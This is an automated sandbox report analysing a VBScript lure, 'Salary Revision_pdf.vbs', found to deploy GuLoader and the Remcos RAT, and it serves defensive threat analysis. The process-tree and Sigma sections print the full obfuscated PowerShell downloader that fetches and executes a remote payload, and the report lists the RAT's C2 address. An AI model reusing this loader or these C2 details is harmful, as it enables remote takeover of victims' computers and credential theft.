Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Salary Revision_pdf.vbs

Overview

General Information

Sample name:Salary Revision_pdf.vbs
Analysis ID:1538691
MD5:28dbf118827e6bf0607e4b736ae51611
SHA1:a0842630151f9633e4283d29dbd737cf1ca372e1
SHA256:aeae4edd76aaab5a1e861d14b5fbc5736fac6b569f74d004224786fcc129099c
Tags:vbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

  • System is w10x64
  • wscript.exe (PID: 7408 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Revision_pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7540 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqeHjelLaba NorResd r , i$.reB Hye PrtMataOv lslaiZebn sig,aveFrsrMensDra)V r ';$Betalingers=$Refractometry188;Vandende (Adiabaticlly ' Un$Kalgs bL HaOOldBalla.arLLeu:semEU,flslsE ntp Hoh.oiA I N KutH eI Fea tasFynIKurs,re=Lob( Rut Ure,ansLnlTses- Unp pfaCorTUn h,bs .nv$T,lBKatE G t MoaInfl s,iC nNop gantEs,cr Fis e)H s ');while (!$Elephantiasis) {Vandende (Adiabaticlly '.en$ AbgWaml anoTumb roa NilAgr:ValUPlonLnigPlarsejoHypp A.e idaOesbMa,lCapeKon=Bag$ApatstrrAriuP re A ') ;Vandende $Oxyhematin;Vandende (Adiabaticlly 'Mo.sBroTDrlARair I,T.li- hys,lsl wae M.eF rpsty P 4sof ');Vandende (Adiabaticlly 'M n$ Udg,rolBedO hB ana Unlpas: heditL oyEL.bpFreH isABi NspeTstaiGreaD,ssMoti Agsbe =T.n(LimTTacEInds HetFal-Vi p grasabt LghDef Ern$si.Bl nERa.tFdeasubLu.sIinsN ImG NoeHelRsy sTra)F a ') ;Vandende (Adiabaticlly 'alf$Teng ,alstiO,orB heaTopLPu :guiKPeru ntR ,os nduRefs DiF InO F,rP.lM CaAskaaAlhLKiss Mi=sis$DisG.amlsatOstubAnaAObelFra:Ry c TraQuaMskapCudBC oe pelneol.ueis osDrfm .n1 .i5.cc4Akv+Ven+svk%D l$gteFFe O stRProsGrdK KlNEtyiMewNKomgsubsGuir GtEKvisU luVvnl eaT T AAcct imE Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly ' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys. TeeA oN iCskrOstiDUnvI piNsteGE e]Mec:Fem:VaaAUdssBefcDroiBr iTra. eG Whef.rTsersMeitFakRNo IIseN .aG Ta(End$ChikQ.arBeriUnclJ,r)idi ');Vandende (Adiabaticlly 'Kal$AutGswil skOBerbU tAAmblB,g:sejsBioKFilrResh eO tiV lieHa d ,sEF sT k=Jge$strr ecaLi TB lI Teo ArnHaiAsimL s Isals Paesubr MaECi . WrsAbnu Deb sks stt OrrDati Nin ag Ad(Ko $skdsstatskra ,eT t uH ssskrlb aIMusNLeuJP rEBurnbas,.an$ nrnYanoin n InCCasustrr,onR fdEArtnstot DeL UdYRec) h ');Vandende $skrhovedet;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7844 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqeHjelLaba NorResd r , i$.reB Hye PrtMataOv lslaiZebn sig,aveFrsrMensDra)V r ';$Betalingers=$Refractometry188;Vandende (Adiabaticlly ' Un$Kalgs bL HaOOldBalla.arLLeu:semEU,flslsE ntp Hoh.oiA I N KutH eI Fea tasFynIKurs,re=Lob( Rut Ure,ansLnlTses- Unp pfaCorTUn h,bs .nv$T,lBKatE G t MoaInfl s,iC nNop gantEs,cr Fis e)H s ');while (!$Elephantiasis) {Vandende (Adiabaticlly '.en$ AbgWaml anoTumb roa NilAgr:ValUPlonLnigPlarsejoHypp A.e idaOesbMa,lCapeKon=Bag$ApatstrrAriuP re A ') ;Vandende $Oxyhematin;Vandende (Adiabaticlly 'Mo.sBroTDrlARair I,T.li- hys,lsl wae M.eF rpsty P 4sof ');Vandende (Adiabaticlly 'M n$ Udg,rolBedO hB ana Unlpas: heditL oyEL.bpFreH isABi NspeTstaiGreaD,ssMoti Agsbe =T.n(LimTTacEInds HetFal-Vi p grasabt LghDef Ern$si.Bl nERa.tFdeasubLu.sIinsN ImG NoeHelRsy sTra)F a ') ;Vandende (Adiabaticlly 'alf$Teng ,alstiO,orB heaTopLPu :guiKPeru ntR ,os nduRefs DiF InO F,rP.lM CaAskaaAlhLKiss Mi=sis$DisG.amlsatOstubAnaAObelFra:Ry c TraQuaMskapCudBC oe pelneol.ueis osDrfm .n1 .i5.cc4Akv+Ven+svk%D l$gteFFe O stRProsGrdK KlNEtyiMewNKomgsubsGuir GtEKvisU luVvnl eaT T AAcct imE Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly ' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys. TeeA oN iCskrOstiDUnvI piNsteGE e]Mec:Fem:VaaAUdssBefcDroiBr iTra. eG Whef.rTsersMeitFakRNo IIseN .aG Ta(End$ChikQ.arBeriUnclJ,r)idi ');Vandende (Adiabaticlly 'Kal$AutGswil skOBerbU tAAmblB,g:sejsBioKFilrResh eO tiV lieHa d ,sEF sT k=Jge$strr ecaLi TB lI Teo ArnHaiAsimL s Isals Paesubr MaECi . WrsAbnu Deb sks stt OrrDati Nin ag Ad(Ko $skdsstatskra ,eT t uH ssskrlb aIMusNLeuJP rEBurnbas,.an$ nrnYanoin n InCCasustrr,onR fdEArtnstot DeL UdYRec) h ');Vandende $skrhovedet;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 8140 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6492 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6648 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 788 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vzonifxrpknexemx" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 4696 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xbbfjqhklsfrakibsnra" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["154.216.18.214:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-AOD6MB", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000007.00000003.1853013269.000000000501A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000007.00000003.1789395704.000000000501B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000007.00000003.1794834072.000000000501B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000004.00000002.1680885153.0000000008C40000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 10 entries
            SourceRuleDescriptionAuthorStrings
            amsi64_7540.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

              System Summary

              barindex
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Revision_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Revision_pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Revision_pdf.vbs", ProcessId: 7408, ProcessName: wscript.exe
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 8140, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49930
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Revision_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Revision_pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Revision_pdf.vbs", ProcessId: 7408, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqeHjelLaba NorResd r , i$.reB Hye PrtMataOv lslaiZebn sig,av

              Stealing of Sensitive Information

              barindex
              Source: Registry Key setAuthor: Joe Security: Data: Details: C6 10 8F 4A 99 E6 71 BE D8 49 19 4A C4 38 62 E1 45 8A 69 0C DD 30 FD 53 7A 01 5A 95 E6 B9 62 DD 3F 50 CA B8 97 ED C2 BA 5E 42 4D 81 79 21 EE 69 B8 B3 DF D5 68 5E 81 E1 31 91 8B AB F7 6D 74 B7 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 8140, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-AOD6MB\exepath
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-21T17:05:59.792925+020020365941Malware Command and Control Activity Detected192.168.2.749960154.216.18.2142404TCP
              2024-10-21T17:06:00.803913+020020365941Malware Command and Control Activity Detected192.168.2.749971154.216.18.2142404TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-21T17:06:00.752150+020028033043Unknown Traffic192.168.2.749972178.237.33.5080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-21T17:05:54.531278+020028032702Potentially Bad Traffic192.168.2.749930188.114.97.3443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["154.216.18.214:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-AOD6MB", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Source: Salary Revision_pdf.vbsReversingLabs: Detection: 13%
              Source: Yara matchFile source: 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
